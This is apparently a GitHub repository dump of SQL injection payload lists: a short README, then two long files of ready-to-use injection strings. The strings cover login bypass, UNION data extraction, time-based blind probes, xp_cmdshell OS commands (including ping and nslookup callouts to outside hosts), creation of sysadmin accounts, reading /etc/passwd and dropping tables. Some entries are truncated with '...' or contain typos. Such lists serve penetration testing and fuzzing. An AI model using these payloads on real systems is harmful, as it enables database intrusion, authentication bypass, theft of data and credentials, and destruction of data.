SQL Injection Vulnerability Payload List
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 | Overview:
18 |
19 | A SQL injection attack consists of insertion or "injection" of a SQL query
20 | via the input data from the client to the application. A successful SQL injection exploit
21 | can read sensitive data from the database, modify database data (Insert/Update/Delete),
22 | execute administration operations on the database (such as shutdown the DBMS), recover the content of a
23 | given file present on the DBMS file system and in some cases issue commands to the operating system.
24 | SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order
25 | to effect the execution of predefined SQL commands.
26 |
27 |
References
28 |
29 |
30 | • SQL Injection point_right https://www.owasp.org/index.php/SQL_Injection
31 |
32 |
33 | Download
34 |
35 | Cloning an Existing Repository ( Clone with HTTPS )
36 |
37 | root@slife:~# git clone https://github.com/omurugur/SQL_Injection_Payload.git
38 |
39 | Cloning an Existing Repository ( Clone with SSH )
40 |
41 | root@slife:~# git clone git@github.com:omurugur/SQL_Injection_Payload.git
42 |
43 |
44 |
45 | Contact
46 |
47 | Mail : omurugur12@gmail.com
48 |
49 | Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
50 |
51 | GitHub : https://github.com/omurugur
52 |
53 | Twitter : https://twitter.com/omurugurrr
54 |
55 | Medium : https://omurugur.medium.com/
56 |
57 | Donate!
58 |
59 | Support the authors:
60 |
--------------------------------------------------------------------------------
/SQL-Auth-Bypass.txt:
--------------------------------------------------------------------------------
1 | '-'
2 | ' '
3 | '&'
4 | '^'
5 | '*'
6 | ' or ''-'
7 | ' or '' '
8 | ' or ''&'
9 | ' or ''^'
10 | ' or ''*'
11 | "-"
12 | " "
13 | "&"
14 | "^"
15 | "*"
16 | " or ""-"
17 | " or "" "
18 | " or ""&"
19 | " or ""^"
20 | " or ""*"
21 | or true--
22 | " or true--
23 | ' or true--
24 | ") or true--
25 | ') or true--
26 | ' or 'x'='x
27 | ') or ('x')=('x
28 | ')) or (('x'))=(('x
29 | " or "x"="x
30 | ") or ("x")=("x
31 | ")) or (("x"))=(("x
32 | or 1=1
33 | or 1=1--
34 | or 1=1#
35 | or 1=1/*
36 | admin' --
37 | admin' #
38 | admin'/*
39 | admin' or '1'='1
40 | admin' or '1'='1'--
41 | admin' or '1'='1'#
42 | admin' or '1'='1'/*
43 | admin'or 1=1 or ''='
44 | admin' or 1=1
45 | admin' or 1=1--
46 | admin' or 1=1#
47 | admin' or 1=1/*
48 | admin') or ('1'='1
49 | admin') or ('1'='1'--
50 | admin') or ('1'='1'#
51 | admin') or ('1'='1'/*
52 | admin') or '1'='1
53 | admin') or '1'='1'--
54 | admin') or '1'='1'#
55 | admin') or '1'='1'/*
56 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
57 | admin" --
58 | admin" #
59 | admin"/*
60 | admin" or "1"="1
61 | admin" or "1"="1"--
62 | admin" or "1"="1"#
63 | admin" or "1"="1"/*
64 | admin"or 1=1 or ""="
65 | admin" or 1=1
66 | admin" or 1=1--
67 | admin" or 1=1#
68 | admin" or 1=1/*
69 | admin") or ("1"="1
70 | admin") or ("1"="1"--
71 | admin") or ("1"="1"#
72 | admin") or ("1"="1"/*
73 | admin") or "1"="1
74 | admin") or "1"="1"--
75 | admin") or "1"="1"#
76 | admin") or "1"="1"/*
77 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
78 | ==
79 | =
80 | '
81 | ' --
82 | ' #
83 | ' –
84 | '--
85 | '/*
86 | '#
87 | " --
88 | " #
89 | "/*
90 | ' and 1='1
91 | ' and a='a
92 | or 1=1
93 | or true
94 | ' or ''='
95 | " or ""="
96 | 1′) and '1′='1–
97 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
98 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
99 | and 1=1
100 | and 1=1–
101 | ' and 'one'='one
102 | ' and 'one'='one–
103 | ' group by password having 1=1--
104 | ' group by userid having 1=1--
105 | ' group by username having 1=1--
106 | like '%'
107 | or 0=0 --
108 | or 0=0 #
109 | or 0=0 –
110 | ' or 0=0 #
111 | ' or 0=0 --
112 | ' or 0=0 #
113 | ' or 0=0 –
114 | " or 0=0 --
115 | " or 0=0 #
116 | " or 0=0 –
117 | %' or '0'='0
118 | or 1=1
119 | or 1=1--
120 | or 1=1/*
121 | or 1=1#
122 | or 1=1–
123 | ' or 1=1--
124 | ' or '1'='1
125 | ' or '1'='1'--
126 | ' or '1'='1'/*
127 | ' or '1'='1'#
128 | ' or '1′='1
129 | ' or 1=1
130 | ' or 1=1 --
131 | ' or 1=1 –
132 | ' or 1=1--
133 | ' or 1=1;#
134 | ' or 1=1/*
135 | ' or 1=1#
136 | ' or 1=1–
137 | ') or '1'='1
138 | ') or '1'='1--
139 | ') or '1'='1'--
140 | ') or '1'='1'/*
141 | ') or '1'='1'#
142 | ') or ('1'='1
143 | ') or ('1'='1--
144 | ') or ('1'='1'--
145 | ') or ('1'='1'/*
146 | ') or ('1'='1'#
147 | 'or'1=1
148 | 'or'1=1′
149 | " or "1"="1
150 | " or "1"="1"--
151 | " or "1"="1"/*
152 | " or "1"="1"#
153 | " or 1=1
154 | " or 1=1 --
155 | " or 1=1 –
156 | " or 1=1--
157 | " or 1=1/*
158 | " or 1=1#
159 | " or 1=1–
160 | ") or "1"="1
161 | ") or "1"="1"--
162 | ") or "1"="1"/*
163 | ") or "1"="1"#
164 | ") or ("1"="1
165 | ") or ("1"="1"--
166 | ") or ("1"="1"/*
167 | ") or ("1"="1"#
168 | ) or '1′='1–
169 | ) or ('1′='1–
170 | ' or 1=1 LIMIT 1;#
171 | 'or 1=1 or ''='
172 | "or 1=1 or ""="
173 | ' or 'a'='a
174 | ' or a=a--
175 | ' or a=a–
176 | ') or ('a'='a
177 | " or "a"="a
178 | ") or ("a"="a
179 | ') or ('a'='a and hi") or ("a"="a
180 | ' or 'one'='one
181 | ' or 'one'='one–
182 | ' or uid like '%
183 | ' or uname like '%
184 | ' or userid like '%
185 | ' or user like '%
186 | ' or username like '%
187 | ' or 'x'='x
188 | ') or ('x'='x
189 | " or "x"="x
190 | ' OR 'x'='x'#;
191 | '=' 'or' and '=' 'or'
192 | ' UNION ALL SELECT 1, @@version;#
193 | ' UNION ALL SELECT system_user(),user();#
194 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
195 | admin' and substring(password/text(),1,1)='7
196 | ' and substring(password/text(),1,1)='7
197 |
--------------------------------------------------------------------------------
/SQL-Inj-Payload.txt:
--------------------------------------------------------------------------------
1 | # ms-sqli info disclosure payload fuzzfile
2 | # replace regex with your fuzzer for best results
3 | # run wireshark or tcpdump, look for incoming smb or icmp packets from victim
4 | # might need to terminate payloads with ;--
5 | select @@version
6 | select @@servernamee
7 | select @@microsoftversione
8 | select * from master..sysserverse
9 | select * from sysusers
10 | exec master..xp_cmdshell 'ipconfig+/all'
11 | exec master..xp_cmdshell 'net+view'
12 | exec master..xp_cmdshell 'net+users'
13 | exec master..xp_cmdshell 'ping+'
14 | BACKUP database master to disks='\\\\backupdb.dat'
15 | create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
16 | # you will need to customize/modify some of the vaules in the queries for best effect
17 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
18 | 'create user name identified by 'pass123' --
19 | 'create user name identified by pass123 temporary tablespace temp default tablespace users;
20 | ' ; drop table temp --
21 | 'exec sp_addlogin 'name' , 'password' --
22 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
23 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
24 | ' grant connect to name; grant resource to name; --
25 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
26 | ' or 1=1 --
27 | ' union (select @@version) --
28 | ' union (select NULL, (select @@version)) --
29 | ' union (select NULL, NULL, (select @@version)) --
30 | ' union (select NULL, NULL, NULL, (select @@version)) --
31 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
32 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
33 | 1'1
34 | 1 exec sp_ (or exec xp_)
35 | 1 and 1=1
36 | 1' and 1=(select count(*) from tablenames); --
37 | 1 or 1=1
38 | 1' or '1'='1
39 |
40 | )%20or%20('x'='x
41 | %20or%201=1
42 | ; execute immediate 'sel' || 'ect us' || 'er'
43 | benchmark(10000000,MD5(1))#
44 | update
45 | ";waitfor delay '0:0:__TIME__'--
46 | 1) or pg_sleep(__TIME__)--
47 | ||(elt(-3+5,bin(15),ord(10),hex(char(45))))
48 | "hi"") or (""a""=""a"
49 | delete
50 | like
51 | " or sleep(__TIME__)#
52 | pg_sleep(__TIME__)--
53 | *(|(objectclass=*))
54 | declare @q nvarchar (200) 0x730065006c00650063 ...
55 | or 0=0 #
56 | insert
57 | 1) or sleep(__TIME__)#
58 | ) or ('a'='a
59 | ; exec xp_regread
60 | *|
61 | @var select @var as var into temp end --
62 | 1)) or benchmark(10000000,MD5(1))#
63 | asc
64 | (||6)
65 | "a"" or 3=3--"
66 | " or benchmark(10000000,MD5(1))#
67 | # from wapiti
68 | or 0=0 --
69 | 1 waitfor delay '0:0:10'--
70 | or 'a'='a
71 | hi or 1=1 --"
72 | or a = a
73 | UNION ALL SELECT
74 | ) or sleep(__TIME__)='
75 | )) or benchmark(10000000,MD5(1))#
76 | hi' or 'a'='a
77 | 0
78 | 21 %
79 | limit
80 | or 1=1
81 | or 2 > 1
82 | ")) or benchmark(10000000,MD5(1))#
83 | PRINT
84 | hi') or ('a'='a
85 | or 3=3
86 | ));waitfor delay '0:0:__TIME__'--
87 | a' waitfor delay '0:0:10'--
88 | 1;(load_file(char(47,101,116,99,47,112,97,115, ...
89 | or%201=1
90 | 1 or sleep(__TIME__)#
91 | or 1=1
92 | and 1 in (select var from temp)--
93 | or '7659'='7659
94 | or 'text' = n'text'
95 | --
96 | or 1=1 or ''='
97 | declare @s varchar (200) select @s = 0x73656c6 ...
98 | exec xp
99 | ; exec master..xp_cmdshell 'ping 172.10.1.255'--
100 | 3.10E+17
101 | " or pg_sleep(__TIME__)--
102 | x' AND email IS NULL; --
103 | &
104 | admin' or '
105 | or 'unusual' = 'unusual'
106 | //
107 | truncate
108 | 1) or benchmark(10000000,MD5(1))#
109 | \x27UNION SELECT
110 | declare @s varchar(200) select @s = 0x77616974 ...
111 | tz_offset
112 | sqlvuln
113 | "));waitfor delay '0:0:__TIME__'--
114 | ||6
115 | or%201=1 --
116 | %2A%28%7C%28objectclass%3D%2A%29%29
117 | or a=a
118 | ) union select * from information_schema.tables;
119 | PRINT @@variable
120 | or isNULL(1/0) /*
121 | 26 %
122 | " or "a"="a
123 | (sqlvuln)
124 | x' AND members.email IS NULL; --
125 | or 1=1--
126 | and 1=( if((load_file(char(110,46,101,120,11 ...
127 | 0x770061006900740066006F0072002000640065006C00 ...
128 | %20'sleep%2050'
129 | as
130 | 1)) or pg_sleep(__TIME__)--
131 | /**/or/**/1/**/=/**/1
132 | union all select @@version--
133 | ,@variable
134 | (sqlattempt2)
135 | or (EXISTS)
136 | t'exec master..xp_cmdshell 'nslookup www.googl ...
137 | %20$(sleep%2050)
138 | 1 or benchmark(10000000,MD5(1))#
139 | %20or%20''='
140 | ||UTL_HTTP.REQUEST
141 | or pg_sleep(__TIME__)--
142 | hi' or 'x'='x';
143 | ") or sleep(__TIME__)="
144 | or 'whatever' in ('whatever')
145 | ; begin declare @var varchar(8000) set @var=' ...
146 | union select 1,load_file('/etc/passwd'),1,1,1;
147 | 0x77616974666F722064656C61792027303A303A313027 ...
148 | exec(@s)
149 | ) or pg_sleep(__TIME__)--
150 | union select
151 | or sleep(__TIME__)#
152 | select * from information_schema.tables--
153 | a' or 1=1--
154 | a' or 'a' = 'a
155 | declare @s varchar(22) select @s =
156 | or 2 between 1 and 3
157 | or a=a--
158 | or '1'='1
159 | |
160 | or sleep(__TIME__)='
161 | or 1 --'
162 | or 0=0 #"
163 | having
164 | a'
165 | " or isNULL(1/0) /*
166 | declare @s varchar (8000) select @s = 0x73656c ...
167 | â or 1=1 --
168 | char%4039%41%2b%40SELECT
169 | order by
170 | bfilename
171 | having 1=1--
172 | ) or benchmark(10000000,MD5(1))#
173 | or username like char(37);
174 | ;waitfor delay '0:0:__TIME__'--
175 | " or 1=1--
176 | x' AND userid IS NULL; --
177 | */*
178 | or 'text' > 't'
179 | (select top 1
180 | or benchmark(10000000,MD5(1))#
181 | ");waitfor delay '0:0:__TIME__'--
182 | a' or 3=3--
183 | -- &password=
184 | group by userid having 1=1--
185 | or ''='
186 | ; exec master..xp_cmdshell
187 | %20or%20x=x
188 | select
189 | ")) or sleep(__TIME__)="
190 | 0x730065006c0065006300740020004000400076006500 ...
191 | hi' or 1=1 --
192 | ") or pg_sleep(__TIME__)--
193 | %20or%20'x'='x
194 | or 'something' = 'some'+'thing'
195 | exec sp
196 | 29 %
197 | (
198 | ý or 1=1 --
199 | 1 or pg_sleep(__TIME__)--
200 | 0 or 1=1
201 | ) or (a=a
202 | uni/**/on sel/**/ect
203 | replace
204 | %27%20or%201=1
205 | )) or pg_sleep(__TIME__)--
206 | %7C
207 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
208 | '%20OR
209 | ; or '1'='1'
210 | declare @q nvarchar (200) select @q = 0x770061 ...
211 | 1 or 1=1
212 | ; exec ('sel' + 'ect us' + 'er')
213 | 23 OR 1=1
214 | /
215 | anything' OR 'x'='x
216 | declare @q nvarchar (4000) select @q =
217 | or 0=0 --
218 | desc
219 | ||'6
220 | )
221 | 1)) or sleep(__TIME__)#
222 | or 0=0 #
223 | select name from syscolumns where id = (sele ...
224 | hi or a=a
225 | *(|(mail=*))
226 | password:*/=1--
227 | distinct
228 | );waitfor delay '0:0:__TIME__'--
229 | to_timestamp_tz
230 | ") or benchmark(10000000,MD5(1))#
231 | UNION SELECT
232 | %2A%28%7C%28mail%3D%2A%29%29
233 | +sqlvuln
234 | or 1=1 /*
235 | )) or sleep(__TIME__)='
236 | or 1=1 or ""=
237 | or 1 in (select @@version)--
238 | sqlvuln;
239 | union select * from users where login = char ...
240 | x' or 1=1 or 'x'='y
241 | 28 %
242 | â or 3=3 --
243 | @variable
244 | or '1'='1'--
245 | "a"" or 1=1--"
246 | //*
247 | %2A%7C
248 | " or 0=0 --
249 | ")) or pg_sleep(__TIME__)--
250 | ?
251 | or 1/*
252 | !
253 | '
254 | or a = a
255 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
256 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
257 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
258 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
259 | ' or 1=1
260 | or 1=1 --
261 | x' OR full_name LIKE '%Bob%
262 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
263 | '%20or%20''='
264 | '%20or%20'x'='x
265 | ')%20or%20('x'='x
266 | ' or 0=0 --
267 | ' or 0=0 #
268 | or 0=0 #"
269 | ' or 1=1--
270 | ' or '1'='1'--
271 | ' or 1 --'
272 | or 1=1--
273 | ' or 1=1 or ''='
274 | or 1=1 or ""=
275 | ' or a=a--
276 | or a=a
277 | ') or ('a'='a
278 | 'hi' or 'x'='x';
279 | or
280 | procedure
281 | handler
282 | ' or username like '%
283 | ' or uname like '%
284 | ' or userid like '%
285 | ' or uid like '%
286 | ' or user like '%
287 | '; exec master..xp_cmdshell
288 | '; exec xp_regread
289 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
290 | --sp_password
291 | ' UNION SELECT
292 | ' UNION ALL SELECT
293 | ' or (EXISTS)
294 | ' (select top 1
295 | '||UTL_HTTP.REQUEST
296 | 1;SELECT%20*
297 | <>"'%;)(&+
298 | '%20or%201=1
299 | 'sqlattempt1
300 | %28
301 | %29
302 | %26
303 | %21
304 | ' or ''='
305 | ' or 3=3
306 | or 3=3 --
307 |
--------------------------------------------------------------------------------